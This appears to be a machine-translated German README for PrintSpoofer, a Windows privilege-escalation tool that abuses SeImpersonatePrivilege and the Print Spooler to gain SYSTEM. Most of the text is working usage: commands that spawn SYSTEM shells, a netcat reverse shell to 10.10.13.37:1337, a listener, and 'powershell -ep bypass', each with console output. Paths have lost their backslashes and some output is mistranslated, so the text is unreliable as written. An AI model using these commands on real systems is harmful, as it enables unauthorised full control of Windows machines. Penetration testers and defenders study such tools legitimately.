PrintSpoofer
PrintSpoofer
Vom LOKALEN/NETZWERKDIENST zum SYSTEM durch Missbrauch SeImpersonatePrivilege unter Windows 10 und Server 2016/2019.
Sie können die Hilfemeldung mit der Option -h überprüfen.
C:TOOLS>PrintSpoofer.exe -h PrintSpoofer v0.1 (von @itm4n) Vorausgesetzt, dass der aktuelle Benutzer über die SeImpersonate-Berechtigung verfügt, nutzt dieses Tool die Funktion „Drucken“. Spooler-Dienst zum Abrufen eines SYSTEM-Tokens und anschließendes Ausführen eines benutzerdefinierten Befehls mit CreateProcessAsUser() Argumente: -cFühre den Befehl *CMD* aus -i Mit dem neuen Prozess in der aktuellen Eingabeaufforderung interagieren (Standard ist nicht interaktiv) -d Erzeugt einen neuen Prozess auf dem Desktop, der dieser Sitzungs-*ID* entspricht (überprüfen Sie Ihre ID mit qwinsta). -h Das bin ich :) Beispiele: - Führen Sie PowerShell als SYSTEM in der aktuellen Konsole aus PrintSpoofer.exe -i -c powershell.exe - Erzeugen Sie eine SYSTEM-Eingabeaufforderung auf dem Desktop der Sitzung 1 PrintSpoofer.exe -d 1 -c cmd.exe - Holen Sie sich eine SYSTEM-Reverse-Shell PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
Wenn Sie über eine interaktive Shell verfügen, können Sie in Ihrer aktuellen Konsole einen neuen SYSTEM-Prozess erstellen.
Anwendungsfall : Bind-Shell, Reverse-Shell, psexec.py usw.
C:TOOLS>PrintSpoofer.exe -i -c cmd [+] Berechtigung gefunden: SeImpersonatePrivilege [+] Named Pipe Listening... [+] CreateProcessAsUser() OK Microsoft Windows [Version 10.0.19613.1000] (c) 2020 Microsoft Corporation. Alle Rechte vorbehalten. C:WINDOWSsystem32>whoami nt Autoritätssystem
Wenn Sie Befehle ausführen können, aber keine interaktive Shell haben, können Sie einen neuen SYSTEM-Prozess erstellen und diesen sofort beenden, ohne mit ihm zu interagieren.
Anwendungsfall : WinRM, WebShell, wmiexec.py , smbexec.py usw.
Erstellen Sie eine Reverse-Shell:
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] Berechtigung gefunden: SeImpersonatePrivilege [+] Named Pipe Listening... [+] CreateProcessAsUser() OK
Netcat-Listener:
C:TOOLS>nc.exe -l -p 1337 Microsoft Windows [Version 10.0.19613.1000] (c) 2020 Microsoft Corporation. Alle Rechte vorbehalten. C:WINDOWSsystem32>whoami nt Autoritätssystem
Wenn Sie lokal oder über RDP (einschließlich VDI) angemeldet sind, können Sie eine SYSTEM-Eingabeaufforderung auf Ihrem Desktop erzeugen. Überprüfen Sie zunächst Ihre Sitzungs-ID mit dem Befehl qwinsta und geben Sie diesen Wert dann mit der Option -d an.
Anwendungsfall : Terminalsitzung (RDP), VDI
C:TOOLS>qwinsta SITZUNGSNAME BENUTZERNAME ID STATUS TYP GERÄT Dienstleistungen 0 Disc Konsolenadministrator 1 Aktiv >rdp-tcp#3 lab-user 3 Aktiv rdp-tcp 65536 Hören Sie zu C:TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass" [+] Berechtigung gefunden: SeImpersonatePrivilege [+] Named Pipe Listening... [+] CreateProcessAsUser() OK
